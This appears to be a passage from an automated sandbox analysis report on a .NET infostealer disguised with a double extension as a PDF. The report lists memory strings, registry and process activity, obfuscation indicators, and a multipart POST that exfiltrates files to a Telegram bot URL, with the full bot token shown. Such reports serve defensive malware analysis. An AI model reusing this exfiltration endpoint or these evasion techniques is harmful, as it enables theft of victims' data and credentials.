                      Source: 20220114080343434.pdf.exe, 00000000.00000003.286315824.0000000005CFA000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com5v
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.287143704.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.net
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.net(
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284128821.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netiv
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.292495353.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.292550293.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.292495353.0000000005CEF000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dec
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dedc
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dem
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286803625.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286749544.0000000005CEF000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.286749544.0000000005CEF000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cne&
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: RegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/
                      Source: RegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocumentdocument-----
                      Source: RegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org4
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: RegSvcs.exe, 00000008.00000002.557166211.00000000036A7000.00000004.00000001.sdmpString found in binary or memory: https://xXcVm5kmD6Gyza.org
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: https://xXcVm5kmD6Gyza.org(
                      Source: unknownHTTP traffic detected: POST /bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9d77ee3312256Host: api.telegram.orgContent-Length: 1009Expect: 100-continueConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: api.telegram.org
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49830 version: TLS 1.2
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.311203434.0000000000F48000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: 20220114080343434.pdf.exe
                      .NET source code contains very large array initializationsShow sources
                      Source: 8.0.RegSvcs.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 8.2.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 8.0.RegSvcs.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 8.0.RegSvcs.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 8.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 8.0.RegSvcs.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 20220114080343434.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_0138CA14
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_0138EE70
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_0138EE60
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_074480E0
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_07440B14
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_07440040
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_07440035
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_074480D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015F1FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015F2618
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015FF2F5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015FD2E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015FB118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015F9DB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015FE000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F6520
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F7D90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F93B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F43A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F1620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F76E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F1DC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017FA86E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017FA8D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F1E68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_058247A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05824790
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05824773
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0582D660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05823CEF
                      Source: 20220114080343434.pdf.exeBinary or memory string: OriginalFilename vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameXsRnamTkSyDlCuAFAppJMGlseY.exe4 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320650494.00000000072C0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameXsRnamTkSyDlCuAFAppJMGlseY.exe4 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000000.280755361.0000000000872000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWellKnownSidTy.exe0 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameXsRnamTkSyDlCuAFAppJMGlseY.exe4 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.311203434.0000000000F48000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exeBinary or memory string: OriginalFilenameWellKnownSidTy.exe0 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 20220114080343434.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\20220114080343434.pdf.exe "C:\Users\user\Desktop\20220114080343434.pdf.exe"
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\20220114080343434.pdf.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@1/2
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\EwKDsJegaFtJBPaA
                      Source: 8.0.RegSvcs.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.0.RegSvcs.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.2.RegSvcs.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.2.RegSvcs.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.0.RegSvcs.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.0.RegSvcs.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 20220114080343434.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 20220114080343434.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: 20220114080343434.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WellKnownSidTy.pdb source: 20220114080343434.pdf.exe

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: 20220114080343434.pdf.exe, dO/Q4.cs.Net Code: Kp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.20220114080343434.pdf.exe.870000.0.unpack, dO/Q4.cs.Net Code: Kp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.20220114080343434.pdf.exe.870000.0.unpack, dO/Q4.cs.Net Code: Kp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      .NET source code contains method to dynamically call methods (often used by packers)Show sources
                      Source: 20220114080343434.pdf.exe, dO/Q4.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
                      Source: 0.0.20220114080343434.pdf.exe.870000.0.unpack, dO/Q4.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
                      Source: 0.2.20220114080343434.pdf.exe.870000.0.unpack, dO/Q4.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_07441B5D push edi; retf
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015F1F32 push es; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015F7A37 push edi; retn 0000h
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F60F0 push es; ret
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.23442041847

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Uses an obfuscated file name to hide its real file extension (double extension)Show sources
                      Source: Possible double extension: pdf.exeStatic PE information: 20220114080343434.pdf.exe
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
